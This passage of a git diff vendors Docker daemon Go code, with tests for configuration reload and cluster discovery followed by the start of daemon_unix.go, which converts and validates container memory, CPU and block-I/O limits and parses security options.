+ registries := daemon.RegistryService.ServiceConfig() + + // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. + // Then collect registries.InsecureRegistryCIDRs in dataMap. + // When collecting, we need to convert CIDRS into string as a key, + // while the times of key appears as value. + dataMap := map[string]int{} + for _, value := range registries.InsecureRegistryCIDRs { + if _, ok := dataMap[value.String()]; !ok { + dataMap[value.String()] = 1 + } else { + dataMap[value.String()]++ + } + } + + for _, value := range registries.IndexConfigs { + if _, ok := dataMap[value.Name]; !ok { + dataMap[value.Name] = 1 + } else { + dataMap[value.Name]++ + } + } + + // Finally compare dataMap with the original insecureRegistries. + // Each value in insecureRegistries should appear in daemon's insecure registries, + // and each can only appear exactly ONCE. + for _, r := range insecureRegistries { + if value, ok := dataMap[r]; !ok { + t.Fatalf("Expected daemon insecure registry %s, got none", r) + } else if value != 1 { + t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) + } + } + + // assert if "10.10.1.22:5000" is removed when reloading + if value, ok := dataMap["10.10.1.22:5000"]; ok { + t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) + } + + // assert if "docker2.com" is removed when reloading + if value, ok := dataMap["docker2.com"]; ok { + t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) + } +} + +func TestDaemonReloadNotAffectOthers(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:bar"}, + Debug: true, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:baz"}, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { 
+ t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } + debug := daemon.configStore.Debug + if !debug { + t.Fatalf("Expected debug 'enabled', got 'disabled'") + } +} + +func TestDaemonDiscoveryReload(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1", + ClusterAdvertise: "127.0.0.1:3333", + }, + } + + if err := daemon.initDiscovery(daemon.configStore); err != nil { + t.Fatal(err) + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + + valuesSets := make(map[string]interface{}) + valuesSets["cluster-store"] = "memory://127.0.0.1:2222" + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSets, + }, + } + + expected = discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + ch, errCh = daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if 
!reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["cluster-store"] = "memory://127.0.0.1:2222" + valuesSet["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSet, + }, + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1", + }, + } + valuesSets := make(map[string]interface{}) + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSets, + }, + } + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(10 * time.Second): + t.Fatal("Timeout waiting for discovery") + } + stopCh := 
make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go new file mode 100644 index 0000000000..5b3ffeb72d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go @@ -0,0 +1,1237 @@ +// +build linux freebsd + +package daemon + +import ( + "bytes" + "fmt" + "io/ioutil" + "net" + "os" + "path/filepath" + "runtime" + "runtime/debug" + "strconv" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/blkiodev" + pblkiodev "github.com/docker/docker/api/types/blkiodev" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/runconfig" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/drivers/bridge" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/netutils" + "github.com/docker/libnetwork/options" + lntypes "github.com/docker/libnetwork/types" + "github.com/golang/protobuf/ptypes" + "github.com/opencontainers/runc/libcontainer/cgroups" + "github.com/opencontainers/runc/libcontainer/label" + rsystem "github.com/opencontainers/runc/libcontainer/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + 
 "github.com/pkg/errors" + "github.com/vishvananda/netlink" +) + +const ( + // See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269 + linuxMinCPUShares = 2 + linuxMaxCPUShares = 262144 + platformSupported = true + // It's not kernel limit, we want this 4M limit to supply a reasonable functional container + linuxMinMemory = 4194304 + // constants for remapped root settings + defaultIDSpecifier string = "default" + defaultRemappedID string = "dockremap" + + // constant for cgroup drivers + cgroupFsDriver = "cgroupfs" + cgroupSystemdDriver = "systemd" +) + +func getMemoryResources(config containertypes.Resources) *specs.Memory { + memory := specs.Memory{} + + if config.Memory > 0 { + limit := uint64(config.Memory) + memory.Limit = &limit + } + + if config.MemoryReservation > 0 { + reservation := uint64(config.MemoryReservation) + memory.Reservation = &reservation + } + + if config.MemorySwap != 0 { + swap := uint64(config.MemorySwap) + memory.Swap = &swap + } + + if config.MemorySwappiness != nil { + swappiness := uint64(*config.MemorySwappiness) + memory.Swappiness = &swappiness + } + + if config.KernelMemory != 0 { + kernelMemory := uint64(config.KernelMemory) + memory.Kernel = &kernelMemory + } + + return &memory +} + +func getCPUResources(config containertypes.Resources) *specs.CPU { + cpu := specs.CPU{} + + if config.CPUShares != 0 { + shares := uint64(config.CPUShares) + cpu.Shares = &shares + } + + if config.CpusetCpus != "" { + cpuset := config.CpusetCpus + cpu.Cpus = &cpuset + } + + if config.CpusetMems != "" { + cpuset := config.CpusetMems + cpu.Mems = &cpuset + } + + if config.NanoCPUs > 0 { + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + period := uint64(100 * time.Millisecond / time.Microsecond) + quota := uint64(config.NanoCPUs) * period / 1e9 + cpu.Period = &period + cpu.Quota = &quota + } + + if config.CPUPeriod != 0 { + period := 
uint64(config.CPUPeriod) + cpu.Period = &period + } + + if config.CPUQuota != 0 { + quota := uint64(config.CPUQuota) + cpu.Quota = &quota + } + + if config.CPURealtimePeriod != 0 { + period := uint64(config.CPURealtimePeriod) + cpu.RealtimePeriod = &period + } + + if config.CPURealtimeRuntime != 0 { + runtime := uint64(config.CPURealtimeRuntime) + cpu.RealtimeRuntime = &runtime + } + + return &cpu +} + +func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) { + var stat syscall.Stat_t + var blkioWeightDevices []specs.WeightDevice + + for _, weightDevice := range config.BlkioWeightDevice { + if err := syscall.Stat(weightDevice.Path, &stat); err != nil { + return nil, err + } + weight := weightDevice.Weight + d := specs.WeightDevice{Weight: &weight} + d.Major = int64(stat.Rdev / 256) + d.Minor = int64(stat.Rdev % 256) + blkioWeightDevices = append(blkioWeightDevices, d) + } + + return blkioWeightDevices, nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + var ( + labelOpts []string + err error + ) + + for _, opt := range config.SecurityOpt { + if opt == "no-new-privileges" { + container.NoNewPrivileges = true + continue + } + + var con []string + if strings.Contains(opt, "=") { + con = strings.SplitN(opt, "=", 2) + } else if strings.Contains(opt, ":") { + con = strings.SplitN(opt, ":", 2) + logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.") + } + + if len(con) != 2 { + return fmt.Errorf("invalid --security-opt 1: %q", opt) + } + + switch con[0] { + case "label": + labelOpts = append(labelOpts, con[1]) + case "apparmor": + container.AppArmorProfile = con[1] + case "seccomp": + container.SeccompProfile = con[1] + default: + return fmt.Errorf("invalid --security-opt 2: %q", opt) + } + } + + container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) + return err +} + +func 
getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) { + var throttleDevices []specs.ThrottleDevice + var stat syscall.Stat_t + + for _, d := range devs { + if err := syscall.Stat(d.Path, &stat); err != nil { + return nil, err + } + rate := d.Rate + d := specs.ThrottleDevice{Rate: &rate} + d.Major = int64(stat.Rdev / 256) + d.Minor = int64(stat.Rdev % 256) + throttleDevices = append(throttleDevices, d) + } + + return throttleDevices, nil +} + +func checkKernel() error { + // Check for unsupported kernel versions + // FIXME: it would be cleaner to not test for specific versions, but rather + // test for specific functionalities. + // Unfortunately we can't test for the feature "does not cause a kernel panic" + // without actually causing a kernel panic, so we need this workaround until + // the circumstances of pre-3.10 crashes are clearer. + // For details see https://github.com/docker/docker/issues/407 + // Docker 1.11 and above doesn't actually run on kernels older than 3.4, + // due to containerd-shim usage of PR_SET_CHILD_SUBREAPER (introduced in 3.4). + if !kernel.CheckKernelVersion(3, 10, 0) { + v, _ := kernel.GetKernelVersion() + if os.Getenv("DOCKER_NOWARN_KERNEL_VERSION") == "" { + logrus.Fatalf("Your Linux kernel version %s is not supported for running docker. Please upgrade your kernel to 3.10.0 or newer.", v.String()) + } + } + return nil +} + +// adaptContainerSettings is called during container creation to modify any +// settings necessary in the HostConfig structure. 
+func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { + if adjustCPUShares && hostConfig.CPUShares > 0 { + // Handle unsupported CPUShares + if hostConfig.CPUShares < linuxMinCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, linuxMinCPUShares) + hostConfig.CPUShares = linuxMinCPUShares + } else if hostConfig.CPUShares > linuxMaxCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, linuxMaxCPUShares) + hostConfig.CPUShares = linuxMaxCPUShares + } + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { + // By default, MemorySwap is set to twice the size of Memory. + hostConfig.MemorySwap = hostConfig.Memory * 2 + } + if hostConfig.ShmSize == 0 { + hostConfig.ShmSize = container.DefaultSHMSize + } + var err error + opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged) + if err != nil { + return err + } + hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...) + if hostConfig.MemorySwappiness == nil { + defaultSwappiness := int64(-1) + hostConfig.MemorySwappiness = &defaultSwappiness + } + if hostConfig.OomKillDisable == nil { + defaultOomKillDisable := false + hostConfig.OomKillDisable = &defaultOomKillDisable + } + + return nil +} + +func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) { + warnings := []string{} + + // memory subsystem checks and adjustments + if resources.Memory != 0 && resources.Memory < linuxMinMemory { + return warnings, fmt.Errorf("Minimum memory limit allowed is 4MB") + } + if resources.Memory > 0 && !sysInfo.MemoryLimit { + warnings = append(warnings, "Your kernel does not support memory limit capabilities or the cgroup is not mounted. 
Limitation discarded.") + logrus.Warn("Your kernel does not support memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + resources.Memory = 0 + resources.MemorySwap = -1 + } + if resources.Memory > 0 && resources.MemorySwap != -1 && !sysInfo.SwapLimit { + warnings = append(warnings, "Your kernel does not support swap limit capabilities or the cgroup is not mounted. Memory limited without swap.") + logrus.Warn("Your kernel does not support swap limit capabilities,or the cgroup is not mounted. Memory limited without swap.") + resources.MemorySwap = -1 + } + if resources.Memory > 0 && resources.MemorySwap > 0 && resources.MemorySwap < resources.Memory { + return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage") + } + if resources.Memory == 0 && resources.MemorySwap > 0 && !update { + return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage") + } + if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.") + logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. Memory swappiness discarded.") + resources.MemorySwappiness = nil + } + if resources.MemorySwappiness != nil { + swappiness := *resources.MemorySwappiness + if swappiness < -1 || swappiness > 100 { + return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness) + } + } + if resources.MemoryReservation > 0 && !sysInfo.MemoryReservation { + warnings = append(warnings, "Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. Limitation discarded.") + logrus.Warn("Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. 
Limitation discarded.") + resources.MemoryReservation = 0 + } + if resources.MemoryReservation > 0 && resources.MemoryReservation < linuxMinMemory { + return warnings, fmt.Errorf("Minimum memory reservation allowed is 4MB") + } + if resources.Memory > 0 && resources.MemoryReservation > 0 && resources.Memory < resources.MemoryReservation { + return warnings, fmt.Errorf("Minimum memory limit can not be less than memory reservation limit, see usage") + } + if resources.KernelMemory > 0 && !sysInfo.KernelMemory { + warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + logrus.Warn("Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + resources.KernelMemory = 0 + } + if resources.KernelMemory > 0 && resources.KernelMemory < linuxMinMemory { + return warnings, fmt.Errorf("Minimum kernel memory limit allowed is 4MB") + } + if resources.KernelMemory > 0 && !kernel.CheckKernelVersion(4, 0, 0) { + warnings = append(warnings, "You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.") + logrus.Warn("You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.") + } + if resources.OomKillDisable != nil && !sysInfo.OomKillDisable { + // only produce warnings if the setting wasn't to *disable* the OOM Kill; no point + // warning the caller if they already wanted the feature to be off + if *resources.OomKillDisable { + warnings = append(warnings, "Your kernel does not support OomKillDisable. OomKillDisable discarded.") + logrus.Warn("Your kernel does not support OomKillDisable. 
OomKillDisable discarded.") + } + resources.OomKillDisable = nil + } + + if resources.PidsLimit != 0 && !sysInfo.PidsLimit { + warnings = append(warnings, "Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.") + logrus.Warn("Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.") + resources.PidsLimit = 0 + } + + // cpu subsystem checks and adjustments + if resources.NanoCPUs > 0 && resources.CPUPeriod > 0 { + return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Period cannot both be set") + } + if resources.NanoCPUs > 0 && resources.CPUQuota > 0 { + return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Quota cannot both be set") + } + if resources.NanoCPUs > 0 && (!sysInfo.CPUCfsPeriod || !sysInfo.CPUCfsQuota) { + return warnings, fmt.Errorf("NanoCPUs can not be set, as your kernel does not support CPU cfs period/quota or the cgroup is not mounted") + } + // The highest precision we could get on Linux is 0.001, by setting + // cpu.cfs_period_us=1000ms + // cpu.cfs_quota=1ms + // See the following link for details: + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + // Here we don't set the lower limit and it is up to the underlying platform (e.g., Linux) to return an error. + // The error message is 0.01 so that this is consistent with Windows + if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 { + return warnings, fmt.Errorf("Range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) + } + + if resources.CPUShares > 0 && !sysInfo.CPUShares { + warnings = append(warnings, "Your kernel does not support CPU shares or the cgroup is not mounted. Shares discarded.") + logrus.Warn("Your kernel does not support CPU shares or the cgroup is not mounted. 
Shares discarded.") + resources.CPUShares = 0 + } + if resources.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { + warnings = append(warnings, "Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.") + logrus.Warn("Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.") + resources.CPUPeriod = 0 + } + if resources.CPUPeriod != 0 && (resources.CPUPeriod < 1000 || resources.CPUPeriod > 1000000) { + return warnings, fmt.Errorf("CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)") + } + if resources.CPUQuota > 0 && !sysInfo.CPUCfsQuota { + warnings = append(warnings, "Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.") + logrus.Warn("Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.") + resources.CPUQuota = 0 + } + if resources.CPUQuota > 0 && resources.CPUQuota < 1000 { + return warnings, fmt.Errorf("CPU cfs quota can not be less than 1ms (i.e. 1000)") + } + if resources.CPUPercent > 0 { + warnings = append(warnings, fmt.Sprintf("%s does not support CPU percent. Percent discarded.", runtime.GOOS)) + logrus.Warnf("%s does not support CPU percent. Percent discarded.", runtime.GOOS) + resources.CPUPercent = 0 + } + + // cpuset subsystem checks and adjustments + if (resources.CpusetCpus != "" || resources.CpusetMems != "") && !sysInfo.Cpuset { + warnings = append(warnings, "Your kernel does not support cpuset or the cgroup is not mounted. Cpuset discarded.") + logrus.Warn("Your kernel does not support cpuset or the cgroup is not mounted. 
Cpuset discarded.") + resources.CpusetCpus = "" + resources.CpusetMems = "" + } + cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(resources.CpusetCpus) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset cpus", resources.CpusetCpus) + } + if !cpusAvailable { + return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s", resources.CpusetCpus, sysInfo.Cpus) + } + memsAvailable, err := sysInfo.IsCpusetMemsAvailable(resources.CpusetMems) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset mems", resources.CpusetMems) + } + if !memsAvailable { + return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s", resources.CpusetMems, sysInfo.Mems) + } + + // blkio subsystem checks and adjustments + if resources.BlkioWeight > 0 && !sysInfo.BlkioWeight { + warnings = append(warnings, "Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.") + logrus.Warn("Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.") + resources.BlkioWeight = 0 + } + if resources.BlkioWeight > 0 && (resources.BlkioWeight < 10 || resources.BlkioWeight > 1000) { + return warnings, fmt.Errorf("Range of blkio weight is from 10 to 1000") + } + if resources.IOMaximumBandwidth != 0 || resources.IOMaximumIOps != 0 { + return warnings, fmt.Errorf("Invalid QoS settings: %s does not support Maximum IO Bandwidth or Maximum IO IOps", runtime.GOOS) + } + if len(resources.BlkioWeightDevice) > 0 && !sysInfo.BlkioWeightDevice { + warnings = append(warnings, "Your kernel does not support Block I/O weight_device or the cgroup is not mounted. Weight-device discarded.") + logrus.Warn("Your kernel does not support Block I/O weight_device or the cgroup is not mounted. 
Weight-device discarded.") + resources.BlkioWeightDevice = []*pblkiodev.WeightDevice{} + } + if len(resources.BlkioDeviceReadBps) > 0 && !sysInfo.BlkioReadBpsDevice { + warnings = append(warnings, "Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded.") + logrus.Warn("Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded") + resources.BlkioDeviceReadBps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceWriteBps) > 0 && !sysInfo.BlkioWriteBpsDevice { + warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") + logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") + resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice { + warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.") + logrus.Warn("Your kernel does not support IOPS Block I/O read limit in IO or the cgroup is not mounted. Block I/O IOPS read limit discarded.") + resources.BlkioDeviceReadIOps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceWriteIOps) > 0 && !sysInfo.BlkioWriteIOpsDevice { + warnings = append(warnings, "Your kernel does not support IOPS Block write limit or the cgroup is not mounted. Block I/O IOPS write limit discarded.") + logrus.Warn("Your kernel does not support IOPS Block I/O write limit or the cgroup is not mounted. 
Block I/O IOPS write limit discarded.") + resources.BlkioDeviceWriteIOps = []*pblkiodev.ThrottleDevice{} + } + + return warnings, nil +} + +func (daemon *Daemon) getCgroupDriver() string { + cgroupDriver := cgroupFsDriver + + if UsingSystemd(daemon.configStore) { + cgroupDriver = cgroupSystemdDriver + } + return cgroupDriver +} + +// getCD gets the raw value of the native.cgroupdriver option, if set. +func getCD(config *Config) string { + for _, option := range config.ExecOptions { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil || !strings.EqualFold(key, "native.cgroupdriver") { + continue + } + return val + } + return "" +} + +// VerifyCgroupDriver validates native.cgroupdriver +func VerifyCgroupDriver(config *Config) error { + cd := getCD(config) + if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver { + return nil + } + return fmt.Errorf("native.cgroupdriver option %s not supported", cd) +} + +// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd +func UsingSystemd(config *Config) bool { + return getCD(config) == cgroupSystemdDriver +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + sysInfo := sysinfo.New(true) + + warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config) + if err != nil { + return warnings, err + } + + w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update) + + // no matter err is nil or not, w could have data in itself. + warnings = append(warnings, w...) 
+ + if err != nil { + return warnings, err + } + + if hostConfig.ShmSize < 0 { + return warnings, fmt.Errorf("SHM size can not be less than 0") + } + + if hostConfig.OomScoreAdj < -1000 || hostConfig.OomScoreAdj > 1000 { + return warnings, fmt.Errorf("Invalid value %d, range for oom score adj is [-1000, 1000]", hostConfig.OomScoreAdj) + } + + // ip-forwarding does not affect container with '--net=host' (or '--net=none') + if sysInfo.IPv4ForwardingDisabled && !(hostConfig.NetworkMode.IsHost() || hostConfig.NetworkMode.IsNone()) { + warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") + logrus.Warn("IPv4 forwarding is disabled. Networking will not work") + } + // check for various conflicting options with user namespaces + if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() { + if hostConfig.Privileged { + return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces") + } + if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() { + return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled") + } + if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() { + return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled") + } + } + if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) { + // CgroupParent for systemd cgroup should be named as "xxx.slice" + if len(hostConfig.CgroupParent) <= 6 || !strings.HasSuffix(hostConfig.CgroupParent, ".slice") { + return warnings, fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") + } + } + if hostConfig.Runtime == "" { + hostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName() + } + + if rt := daemon.configStore.GetRuntime(hostConfig.Runtime); rt == nil { + return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime) + } + + return warnings, nil +} + +// 
platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + if config.IsValueSet("runtimes") { + daemon.configStore.Runtimes = config.Runtimes + // Always set the default one + daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + } + + if config.DefaultRuntime != "" { + daemon.configStore.DefaultRuntime = config.DefaultRuntime + } + + // Update attributes + var runtimeList bytes.Buffer + for name, rt := range daemon.configStore.Runtimes { + if runtimeList.Len() > 0 { + runtimeList.WriteRune(' ') + } + runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) + } + + return map[string]string{ + "runtimes": runtimeList.String(), + "default-runtime": daemon.configStore.DefaultRuntime, + } +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + // Check for mutually incompatible config options + if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" { + return fmt.Errorf("You specified -b & --bip, mutually exclusive options. Please specify only one") + } + if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication { + return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. 
Please set --icc or --iptables to true") + } + if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq { + config.bridgeConfig.EnableIPMasq = false + } + if err := VerifyCgroupDriver(config); err != nil { + return err + } + if config.CgroupParent != "" && UsingSystemd(config) { + if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") { + return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") + } + } + + if config.DefaultRuntime == "" { + config.DefaultRuntime = stockRuntimeName + } + if config.Runtimes == nil { + config.Runtimes = make(map[string]types.Runtime) + } + config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + + return nil +} + +// checkSystem validates platform-specific requirements +func checkSystem() error { + if os.Geteuid() != 0 { + return fmt.Errorf("The Docker daemon needs to be run as root") + } + return checkKernel() +} + +// configureMaxThreads sets the Go runtime max threads threshold +// which is 90% of the kernel setting from /proc/sys/kernel/threads-max +func configureMaxThreads(config *Config) error { + mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max") + if err != nil { + return err + } + mtint, err := strconv.Atoi(strings.TrimSpace(string(mt))) + if err != nil { + return err + } + maxThreads := (mtint / 100) * 90 + debug.SetMaxThreads(maxThreads) + logrus.Debugf("Golang's threads limit set to %d", maxThreads) + return nil +} + +// configureKernelSecuritySupport configures and validates security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + if config.EnableSelinuxSupport { + if !selinuxEnabled() { + logrus.Warn("Docker could not enable SELinux on the host system") + } + } else { + selinuxSetDisabled() + } + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, 